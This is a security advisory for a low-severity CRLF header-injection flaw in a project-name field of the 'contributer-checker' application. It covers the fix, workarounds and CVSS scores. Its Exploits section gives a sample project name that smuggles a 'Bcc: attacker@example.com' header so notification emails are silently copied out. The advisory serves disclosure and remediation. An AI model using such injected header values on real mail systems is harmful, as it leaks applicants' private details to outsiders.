Skip to content
GSSA-2026-05-442ENFGITLAB-GSSA-2026-05-442ENFMay 7, 2026
2.0 Low

CRLF injection in email subject via project name

Project name was interpolated into outbound email subjects without rejecting CR/LF, so an admin could inject extra headers (Bcc, etc.) via the project settings form. Fixed by rejecting line breaks in the project name validator.

Affected (1)

  • gelhaus-solutionscontributer-checker
    • ≥ 0.0.0Fixed in 0.0.1

Mitigations

Workarounds

  • Manually rename any project whose name contains a CR (\r) or LF (\n) character before the next outbound email is sent.
  • Configure the SMTP transport to reject messages with multi-line subject headers.

Solutions

  • Upgrade to 0.0.1: `settingsSchema.name` adds a `.refine(v => !/[\r\n]/.test(v))` so CR/LF in the project name is rejected at form submit and never written to the database.

Exploits

  • 1. As a project ADMIN, edit project settings. 2. Set name to `My Project\r\nBcc: attacker@example.com`. 3. Save. 4. The next decision/notification email carries the injected `Bcc:` header — every notification for that project is silently BCCd to the attacker.

Configurations

  • Any deployment with SMTP configured (env `SMTP_HOST` and `SMTP_FROM` set) where transactional notification emails are enabled.
  • Particularly impactful on SMTP transports/older nodemailer versions that do not strip CRLF in headers.

Overview

Project name allowed CR/LF and was used in email subject lines, enabling header injection.

Severity

CVSS v4
2.0 Low
2.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Attack vector
Network
Attack complexity
Low
Attack requirements
None
Privileges required
High
User interaction
None
Confidentiality (vulnerable system)
Low
Integrity (vulnerable system)
Low
Availability (vulnerable system)
None
Confidentiality (subsequent system)
None
Integrity (subsequent system)
None
Availability (subsequent system)
None
CVSS v3
3.8 Low
3.8
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N
Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

Weaknesses (1)

References (3)

Credits (2)

  • Enno Gelhaus
    Remediation developer · egelhaus@ennogelhaus.de
  • Enno Gelhaus
    Finder · egelhaus@ennogelhaus.de

Context

Impacts

  • Header injection in transactional emails (Bcc/Cc/Reply-To/MIME headers) — silent data exfiltration of applicant identities and decision details.

    CAPEC-105

© 2026 Gelhaus Solutions